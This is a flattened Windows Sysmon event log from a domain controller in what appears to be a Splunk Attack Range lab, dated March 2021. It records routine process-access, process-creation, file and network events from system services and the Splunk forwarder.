13:57:02.274{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201095Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.274{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201094Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.274{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201093Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.274{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201092Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.274{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E72E-6040-F44D-00000000AD01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201091Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.274{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E72E-6040-F44D-00000000AD01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201090Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.275{5ABCFE62-E72E-6040-F44D-00000000AD01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002201118Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:58.626{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-59654- 10341000x80000000000000002201117Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:03.478{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E72F-6040-F64D-00000000AD01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201116Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:03.478{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201115Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:03.478{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201114Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:03.478{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201113Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:03.478{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201112Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:03.478{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E72F-6040-F64D-00000000AD01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201111Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:03.478{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E72F-6040-F64D-00000000AD01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201110Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:03.478{5ABCFE62-E72F-6040-F64D-00000000AD01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201109Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:03.478{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AD6617B91668B46F63E55931A8F6E5B,SHA256=C42BD46534E9D7B2C1744466F6156BE05BBDBEA8E8E5E93F0C85A5D9921326D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201108Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:03.306{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA5CB2CD8233740C591743A41C12639D,SHA256=A4A4B37C53D1A023837FE4EBAA9E8A6AB158FCB0DC2BF395A5E43AF8B2D8B888,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201121Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:01.064{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55188-false10.0.1.12-8000- 23542300x80000000000000002201120Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:04.479{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=715155CAAFC14888BDB5F4F46523D269,SHA256=2EE61F2CDD49F149A0728AC29A0C6232318F717C10EA845230B4C6DE6EC24F5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201119Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:04.479{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67C25EDBB95C70772BA1EB4557170E00,SHA256=322EBE11742572ED84FBA4E4D377621F457A4368F9D5640F2057088A6E1D2174,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201122Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:05.494{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD31F644E1DEC7D47BF3F96DE1435787,SHA256=0B9132C665044D7E7EC082992B8D214287E0B23B54B7F5BFB9C59456636605EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201124Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:06.772{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201123Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:06.506{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C58C9543EA99242E2CA5911EE3D0997A,SHA256=91EFEA1EA0B9AF74CF9F9BDF4D003C108024837A57FEE4DBE23B91570CE2AF97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201126Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:07.774{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4978B54E0D457558A0A23C987CDA4350,SHA256=FEFB3FB05CE13336471D25D021A9BFB660A18B106016061A0C6BDE9E4D7C5F01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201125Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:07.522{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC19361625B1A114EE4DFBE2E06684BE,SHA256=3104EB845A6993F7EF15C4C754BC4288DC2D4396E94D81CC9E181E609BA880FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201129Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:08.838{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90150C68BC2087C70E87FFA55F4110D7,SHA256=95695117BAF6BDC1F6B8B420C160C383689077E97E4B57ED2158EA1D66723C62,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201128Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:04.593{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55189-false10.0.1.12-8089- 23542300x80000000000000002201127Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:08.525{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=150B6309BB0AEDEA2C8BC8BACB46026D,SHA256=CCFEC52F3F9EB34CFC1966B39E69E24764932CC697A7E0A562483BFAB4541F4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201130Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:09.541{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE55BA0EDC1BF0BDCB1ECFBF14C3F617,SHA256=F7F5FB6ECE4D60C6A782A5BC8387E6EA4DC38AE876CB6E8027979DABEB175964,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201166Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:06.909{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55190-false10.0.1.12-8000- 23542300x80000000000000002201165Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.619{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDB8AB741100276ECC7A7B24DF65032E,SHA256=3D9AFF3AB41D7567B1A119676ECAED91386FDEDF61875C23F4BD357D119867BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201164Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=125169DAD05C9DE0B0040A1BC442F29A,SHA256=9DA2324FA6C6879B69B0AA72484AC1B6CA9650FDAF1B6324EECA24241E7B8D35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201163Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201162Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201161Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201160Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:10.181{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201159Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 